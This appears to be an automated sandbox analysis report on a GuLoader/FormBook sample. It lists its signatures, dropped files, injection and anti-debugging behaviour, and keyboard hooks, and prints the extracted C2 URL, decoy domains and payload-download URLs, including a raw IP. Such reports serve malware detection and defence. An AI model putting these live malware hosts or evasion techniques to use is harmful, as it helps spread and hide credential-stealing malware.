Analysis Report os9TZxfmTZ.exe

Overview

General Information

Sample Name: os9TZxfmTZ.exe
Analysis ID: 385246
MD5: ad0c93b574bb947cff15483eda82811e
SHA1: ad379c5a86bf646c4a079e737a364ab352107e5b
SHA256: bcaac39113bd17158fe86a77328f97e9c3fa14860c9c4449a8ae0768c85243f4
Tags: exe, GuLoader

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential malicious icon found
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Creates an undocumented autostart registry key
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Hides threads from debuggers
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected VB6 Downloader Generic
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Installs a global mouse hook
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: os9TZxfmTZ.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\icsys.icn.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\mrsys.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Windows\System\svchost.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\stsys.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Windows\System\spoolsv.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Windows\System\explorer.exe Avira: detection malicious, Label: TR/Dropper.Gen
Found malware configuration
Source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.evolvekitchendesign.com/ffw/"], "decoy": ["unmutedgenerations.com", "localmoversuae.com", "centralrea.com", "geyyfphzoe.com", "silverpackfactory.com", "techtronixx.com", "shop-deinen-deal.com", "buehne.cloud", "inspirefreedomtoday.com", "chapelcouture.com", "easton-taiwan.com", "quanaonudep.store", "merzigomusic.com", "wpzoomin.com", "service-lkytrsahdfpedf.com", "yeasuc.com", "mydogtrainingservice.com", "galeribisnisonline.com", "cscremodeling.com", "bom-zzxx.com", "ensobet88.com", "vegancto.com", "digivisiol.com", "advancetools.net", "gzqyjd.com", "xtgnsl.com", "ftfortmyers.com", "g-siqueira.com", "ufdzbhrxk.icu", "tiekotiin.com", "youschrutedit.com", "takahatadenkikouji.com", "goodfastco.com", "jtelitetraining.com", "planet-hype.com", "gigwindow.com", "levelxpr.com", "besttechmobcomm.info", "funneldesigngenie.com", "mylisting.cloud", "alltwoyou.com", "mortgagesandprotection.online", "monthlydigest.info", "senlangdq.com", "postphenomenon.com", "slymwhite.com", "masonpreschool.com", "wahooshop.com", "meridiangummies.com", "samsungpartsdept.com", "saludbellezaybienestar.net", "vickifoxproductions.com", "shawandwesson.info", "nutrepele.com", "gorillatanks.com", "praktijkinfinity.online", "lanteredam.com", "refinedmanagement.com", "tiwapay.com", "fruitsinbeers.com", "charliekay.net", "realironart.com", "sonsofmari.com", "kedingtonni.com"]}
Source: 0000001D.00000002.347705923.0000000000563000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://demo.sdssoftltd.co.uk/bin_iOxAb78.bin\u0000http://103.141.138.118/bin_iOxAb78"}
Multi AV Scanner detection for submitted file
Source: os9TZxfmTZ.exe Virustotal: Detection: 82%
Source: os9TZxfmTZ.exe ReversingLabs: Detection: 95%
Yara detected FormBook
Source: Yara match File source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\icsys.icn.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\mrsys.exe Joe Sandbox ML: detected
Source: C:\Windows\System\svchost.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\stsys.exe Joe Sandbox ML: detected
Source: C:\Windows\System\spoolsv.exe Joe Sandbox ML: detected
Source: C:\Windows\System\explorer.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: os9TZxfmTZ.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.icsys.icn.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 8.2.spoolsv.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 5.2.spoolsv.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 38.2.explorer.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 8.0.spoolsv.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 0.2.os9TZxfmTZ.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 2.0.icsys.icn.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 4.0.explorer.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 6.0.svchost.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 4.2.explorer.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 5.0.spoolsv.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 38.0.explorer.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 0.0.os9TZxfmTZ.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen

Compliance:

Uses 32bit PE files
Source: os9TZxfmTZ.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: explorer.pdbUGP source: os9tzxfmtz.exe, 0000001D.00000002.353878128.000000001E6B0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: os9tzxfmtz.exe, 0000001D.00000002.353360463.000000001E380000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: os9tzxfmtz.exe
Source: Binary string: explorer.pdb source: os9tzxfmtz.exe, 0000001D.00000002.353878128.000000001E6B0000.00000040.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Code function: 4x nop then push ebp 0_2_00417143
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Code function: 4x nop then push ebp 0_2_00416130
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Code function: 4x nop then push ebp 0_2_004171D7
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Code function: 4x nop then push ebp 0_2_004179F2
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Code function: 4x nop then push ebp 0_2_00417190
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Code function: 4x nop then push ebp 0_2_0041725A
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Code function: 4x nop then push ebp 0_2_004172E5

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.evolvekitchendesign.com/ffw/
Source: Malware configuration extractor URLs: https://demo.sdssoftltd.co.uk/bin_iOxAb78.binhttp://103.141.138.118/bin_iOxAb78
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_00569F5D InternetReadFile, 29_2_00569F5D
Source: global traffic HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: vccmd01.googlecode.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Mon, 12 Apr 2021 06:59:22 GMT
Source: os9tzxfmtz.exe String found in binary or memory: http://103.141.138.118/bin_iOxAb78.bin
Source: svchost.exe, 00000007.00000002.499129422.0000017AF2815000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000007.00000002.499129422.0000017AF2815000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000007.00000002.499129422.0000017AF2815000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000007.00000002.495084605.0000017AED2B1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2
Source: svchost.exe, 00000007.00000002.500311596.0000017AF2AD0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000004.00000002.367343924.00000000007E8000.00000004.00000020.sdmp String found in binary or memory: http://vccmd01.googlecode.com/
Source: explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp, explorer.exe, 00000004.00000002.367327455.00000000007DD000.00000004.00000020.sdmp String found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000002.367258347.00000000007A1000.00000004.00000020.sdmp String found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gifA
Source: explorer.exe, 00000004.00000002.367258347.00000000007A1000.00000004.00000020.sdmp String found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gift
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp, explorer.exe, 00000004.00000002.367305174.00000000007CA000.00000004.00000020.sdmp String found in binary or memory: http://vccmd01.t35.com/cmsys.gif
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp String found in binary or memory: http://vccmd01.t35.com/cmsys.gifnw
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp String found in binary or memory: http://vccmd01.t35.com/cmsys.gifr
Source: explorer.exe, 00000004.00000002.367234221.0000000000783000.00000004.00000020.sdmp String found in binary or memory: http://vccmd01.t35.com/cmsys.gifusercontent.comn
Source: explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp String found in binary or memory: http://vccmd01.t35.com/e.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000002.367234221.0000000000783000.00000004.00000020.sdmp String found in binary or memory: http://vccmd01.zxq.net/
Source: explorer.exe, 00000004.00000002.367234221.0000000000783000.00000004.00000020.sdmp String found in binary or memory: http://vccmd01.zxq.net/01.zxq.net/cmsys.gifusercontent.comu
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp String found in binary or memory: http://vccmd01.zxq.net/cmsys.gif
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp String found in binary or memory: http://vccmd01.zxq.net/cmsys.gifH
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp String found in binary or memory: http://vccmd01.zxq.net/cmsys.gifVw
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp String found in binary or memory: http://vccmd01.zxq.net/cmsys.gifllxw
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp String found in binary or memory: http://vccmd01.zxq.net/cmsys.gifr
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp String found in binary or memory: http://vccmd01.zxq.net/cmsys.gift
Source: explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp String found in binary or memory: http://vccmd01.zxq.net/e.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000002.367343924.00000000007E8000.00000004.00000020.sdmp String found in binary or memory: http://vccmd02.googlecode.com/
Source: explorer.exe, 00000004.00000002.367343924.00000000007E8000.00000004.00000020.sdmp String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000002.367327455.00000000007DD000.00000004.00000020.sdmp String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gifi%I
Source: explorer.exe, 00000004.00000002.367343924.00000000007E8000.00000004.00000020.sdmp String found in binary or memory: http://vccmd03.googlecode.com/
Source: explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp, explorer.exe, 00000004.00000002.367327455.00000000007DD000.00000004.00000020.sdmp String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gifC%c
Source: explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gifP%n
Source: svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: os9tzxfmtz.exe String found in binary or memory: https://demo.sdssoftltd.co.uk/bin_iOxAb78.bin
Source: os9tzxfmtz.exe, 0000001D.00000002.347705923.0000000000563000.00000040.00000001.sdmp String found in binary or memory: https://demo.sdssoftltd.co.uk/bin_iOxAb78.binhttp://103.141.138.118/bin_iOxAb78.bin
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp String found in binary or memory: https://login.live.comI
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Windows user hook set: 6252 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
Source: C:\Users\user\AppData\Local\icsys.icn.exe Windows user hook set: 6340 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
Source: C:\Windows\System\explorer.exe Windows user hook set: 6388 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
Source: C:\Windows\System\explorer.exe Windows user hook set: 0 keyboard low level c:\windows\system\explorer.exe
Source: C:\Windows\System\explorer.exe Windows user hook set: 0 mouse low level c:\windows\system\explorer.exe
Source: C:\Windows\System\spoolsv.exe Windows user hook set: 6412 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
Source: C:\Windows\System\svchost.exe Windows user hook set: 6444 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
Source: C:\Windows\System\spoolsv.exe Windows user hook set: 6636 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
Source: C:\Windows\System\explorer.exe Windows user hook set: 6884 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
Creates a DirectInput object (often for capturing keystrokes)
Source: os9TZxfmTZ.exe, 00000000.00000002.252539425.000000000075A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Installs a global mouse hook
Source: C:\Windows\System\explorer.exe Windows user hook set: 0 mouse low level c:\windows\system\explorer.exe

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Contains functionality to call native functions
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02280A61 EnumWindows,NtSetInformationThread, 1_2_02280A61
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02289F5D NtResumeThread, 1_2_02289F5D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0228906B NtWriteVirtualMemory,LoadLibraryA, 1_2_0228906B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_022899F7 NtProtectVirtualMemory, 1_2_022899F7
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02289A29 NtProtectVirtualMemory, 1_2_02289A29
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283A38 NtWriteVirtualMemory, 1_2_02283A38
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0228A234 NtResumeThread, 1_2_0228A234
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283A05 NtWriteVirtualMemory, 1_2_02283A05
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0228A27F NtResumeThread, 1_2_0228A27F
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283E5F NtWriteVirtualMemory, 1_2_02283E5F
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283A51 NtWriteVirtualMemory, 1_2_02283A51
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283EAF NtWriteVirtualMemory, 1_2_02283EAF
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283A9B NtWriteVirtualMemory, 1_2_02283A9B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283AE7 NtWriteVirtualMemory, 1_2_02283AE7
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0228A321 NtResumeThread, 1_2_0228A321
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283F07 NtWriteVirtualMemory, 1_2_02283F07
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0228376D NtSetInformationThread, 1_2_0228376D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02289F63 NtResumeThread, 1_2_02289F63
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0228A363 NtResumeThread, 1_2_0228A363
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02280B46 NtSetInformationThread, 1_2_02280B46
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02280B53 NtSetInformationThread, 1_2_02280B53
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283B57 NtWriteVirtualMemory, 1_2_02283B57
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02289FAF NtResumeThread, 1_2_02289FAF
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283B88 NtWriteVirtualMemory, 1_2_02283B88
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283F88 NtWriteVirtualMemory, 1_2_02283F88
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02289FE8 NtResumeThread, 1_2_02289FE8
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283BE9 NtWriteVirtualMemory, 1_2_02283BE9
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02280BEB NtSetInformationThread, 1_2_02280BEB
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283FC8 NtWriteVirtualMemory, 1_2_02283FC8
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0228A3D3 NtResumeThread, 1_2_0228A3D3
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0228A020 NtResumeThread, 1_2_0228A020
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0228404F NtWriteVirtualMemory, 1_2_0228404F
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283C4F NtWriteVirtualMemory, 1_2_02283C4F
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02280C41 NtSetInformationThread, 1_2_02280C41
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0228A055 NtResumeThread, 1_2_0228A055
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0228A0A4 NtResumeThread, 1_2_0228A0A4
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283C94 NtWriteVirtualMemory, 1_2_02283C94
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283CD3 NtWriteVirtualMemory, 1_2_02283CD3
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283911 NtWriteVirtualMemory, 1_2_02283911
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0228A113 NtResumeThread, 1_2_0228A113
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283166 NtWriteVirtualMemory,LoadLibraryA, 1_2_02283166
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0228A14B NtResumeThread, 1_2_0228A14B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283D4D NtWriteVirtualMemory, 1_2_02283D4D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0228395B NtWriteVirtualMemory, 1_2_0228395B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0228A189 NtResumeThread, 1_2_0228A189
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283DEF NtWriteVirtualMemory, 1_2_02283DEF
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0228A1F4 NtResumeThread, 1_2_0228A1F4
